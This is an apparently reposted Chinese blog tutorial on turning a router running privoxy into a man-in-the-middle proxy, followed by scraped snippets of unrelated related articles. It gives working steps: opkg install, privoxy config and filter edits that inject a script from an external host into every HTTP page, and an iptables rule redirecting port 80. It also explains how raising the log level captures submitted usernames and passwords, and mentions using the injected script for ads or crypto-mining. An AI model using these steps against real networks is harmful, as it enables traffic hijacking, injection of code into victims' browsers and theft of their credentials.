利用privoxy劫持http网站数据,插入广告,获取用户名,密码

看了几篇privoxy的文章,感觉讲的都不详细,在此整理一遍。

注:本文下面的内容仅讨论思路,作为技术交流之用,请勿用作非法途径.

Privoxy是一款带过滤功能的代理服务器,针对HTTP、HTTPS协议。通过Privoxy的过滤功能,用户可以保护隐私、对网页内容进行过滤、管理cookies,以及拦阻各种广告等。Privoxy可以用作单机,也可以应用到多用户的网络。

Privoxy基于Internet Junkbuster,按照GNU General Public License进行发布。可以在Linux、Windows、Mac OS X、AmigaOS、BeOS,以及各种Unix上运行。

----来自百度百科

privoxy功能很强大,可以用来过滤广告,那么我们也可以用它来插入广告,甚至淘宝返利....

先上图..

环境:免费的K3刷官改版.

刷完系统后 安装 privoxy

命令:

opkg install privoxy

然后编辑 config 文件

vi /tmp/media/nand/opt/etc/privoxy/config

修改listen-address 为如下形式

listen-address  192.168.2.1:8118
accept-intercepted-requests 1

192.168.2.1 为 路由器IP 8118为privoxy的默认监听端口

action 文件

vi /tmp/media/nand/opt/etc/privoxy/user.action

加入以下内容 代表拦截所有网址

+filter{ad}}
.*

filter文件

vi /tmp/media/nand/opt/etc/privoxy/user.filter
FILTER: ad Add ad
s||http://www.abc.com/ad.js"> $0|g

很简单的正则,表示在body标签后插入一段js, 这个js里面就控制了想要插入的广告内容.

这里只分析一下原理,就不放示例代码了... 相信各位大神,都会的....

最后一步 把80端口的数据都转发到8118去,即privoxy监听的端口

iptables -t nat -A PREROUTING -s 0.0.0.0/0.0.0.0 -p tcp --dport 80 -j REDIRECT --to-ports 8118

最后的效果就是第一张图...所以的http网站都被插入了一段js 用来执行代码,甚至用来挖矿...

privoxy功能不只是修改网页内容,还可以记录访问记录..

甚至可以记录下网页提交的表单,这就意味着, 用户名和密码 也在其中..

修改config中的debug级别即可...(默认的日志只记录请求的url.)

至于privoxy还能干嘛,大家自己发挥吧...

所以,,这告诉我们一个道理,不要随便连接陌生wifi...要连接也要尽量访问https网站..

原文地址:https://www.cnblogs.com/mysgk/p/9426995.html

时间: 2024-10-18 09:29:45

利用privoxy劫持http网站数据,插入广告,获取用户名,密码的相关文章

怎么利用云服务进行网站数据迁移

对于站长群体来说,网站数据搬家一直是一件比较麻烦的事情,以致于耽误了网站的正常的运行.要打包数据下载到本地,又要数据库备份迁移,如果不懂技术,还得找人设置服务器或空间等等.站长虽然爱折腾,但也会感到有点烦. 在云概念火热的今天,动辄大数据神马的年达,难道不能用云进行网站数据迁移工作吗? 答案是肯定的.自云技术出现以来,基于云的计算解决方案的流行度就一直是有增无减.这类解决方案恰好满足了个人和企业需求,是个人和企业改进工作职能的最佳选择.经过一段时间的发展,云计算已成为必须的存在,现在它以多种多样

CMS网站漏洞检测对获取管理员密码漏洞如何修复

PbootCMS是网站常用的一款CMS系统,是由国内著名程序开发商翔云科技研发的一套网站CMS系统,免费开源,扩展性较高,使用的企业很多但是避免不了网站存在漏洞,SINE安全对其代码进行安全审计的同时发现该pbootcms 存在严重的漏洞,包含SQL注入获取管理员密码漏洞,以及远程代码注入执行漏洞.该pbootcms系统采用的是PHP语言开发,数据库是MYSQL,并支持pgsql数据库大并发处理,系统默认支持的服务器环境,PHP5.3版本以上,以及mysql版本5.6,apache,nginx,

防止运营商网络劫持,避免被他人强行插入广告

主要的网络劫持形式: 近年来流量劫持(运营商网络劫持)频频发生,各种方式也是层出不穷,易维信-EVTrust总结各种网络劫持现象和其带来的危害 1.域名劫持,用户想要访问网站A,域名却被解析到其它地址,用户无法正常访问想要访问的页面,网站流量受损.如果域名被解析到恶意钓鱼网 站,导致用户财产损失,例如网上用户本来想要访问某知名的金融网站,却被跳转到另一个见容极为相似的假冒网站,从而套取用户数据,导致企业与用户损失惨 重. 2.运营商网络劫持有的会在网站弹出广告,不是所有网站都会弹,一般大型门户网

如何防止运营商网络劫持,避免被他人强行插入广告?

主要的网络劫持形式: 近年来流量劫持(运营商网络劫持)频频发生,各种方式也是层出不穷,易维信-EVTrust总结各种网络劫持现象和其带来的危害 1.域名劫持,用户想要访问网站A,域名却被解析到其它地址,用户无法正常访问想要访问的页面,网站流量受损.如果域名被解析到恶意钓鱼网 站,导致用户财产损失,例如网上用户本来想要访问某知名的金融网站,却被跳转到另一个见容极为相似的假冒网站,从而套取用户数据,导致企业与用户损失惨 重. 2.运营商网络劫持有的会在网站弹出广告,不是所有网站都会弹,一般大型门户网

利用Python实现爬去彩票网站数据——小样

写这篇文章纯属自娱自乐. 主要是近期在自学如何利用Python解决IT运维的一些问题时,总是不得其门而入,为了增加学习兴趣,就想通过完成一个小小有趣的爬虫程序激励下自己,同时也把这次经历跟各位道友分享下. Technorati Tags: Python,爬网,彩票,数据,夏明亮 首先申明,本人不是专职coding的,所以,代码部分如果不符合专业审美,还请多多包涵:俺就是纯粹以实习那目标为基础的小白一枚:思路为先,抛砖引玉~ 步骤一:利用搜索引擎找到你需要的信息的网页资源 1. 打开百度搜索"彩票

利用linux curl爬取网站数据

看到一个看球网站的以下截图红色框数据,想爬取下来,通常爬取网站数据一般都会从java或者python爬取,但本人这两个都不会,只会shell脚本,于是硬着头皮试一下用shell爬取,方法很笨重,但旨在结果嘛,呵呵. 2.首先利用curl工具后者wget工具把整个网站数据爬取下来 curl 网址 >wangzhan.txt 3.查看wangzhan.txt文件,找出规则,看到数据是存放在哪个地方,本人是把txt文件拷到本机上用UE打开方便查看.通过查看文件,我发现数据是存储在"var aut

利用NPOI读取Execl数据插入数据库

首先你得准备NPOI的dll文件 这里提供百度云链接: 链接:https://pan.baidu.com/s/1EavAso5hztTbuexgb9XsvA 提取码:jyk6 前台代码 <%@ Page Language="C#" AutoEventWireup="true" CodeFile="导入到数据库.aspx.cs" Inherits="导入到数据库" %> <!DOCTYPE html> &

apk去广告工具(利用apktool去除apk文件里的广告)

基本知识 apk安装包的文件结构 以知名桌面软件“LauncherPro”为例,apk安装包文件目录: 文件目录如下: - META-INF - res - anim - color - drawable - drawable-hdpi - drawable-land - drawable-land-hdpi - drawable-mdpi - drawable-port - drawable-port-hdpi - layout - layout-land - layout-port - xm

中间人攻击之劫持HTTPS明文数据

敏感数据的安全传输是网络安全技术的一个重要的组成部分,多数认为只有https是最好的实践,姑且不考虑ssl证书的价格,至少https也不是绝对安全的,当遭受中间人劫持攻击的时候也会获取到传输中的明文数据,具体攻击原理见<HTTPS连接过程以及中间人攻击劫持>,但是这篇文章也说了,使用中间人攻击手段必须让客户端信任中间人的证书,否则攻击无效.因此这种攻击方式难度大且不方便攻击,但是并不是说不能实现.个人认为至少有以下两种方式可以进行利用:??一.获取服务器的远程桌面登录权限后,设置客户端信任中间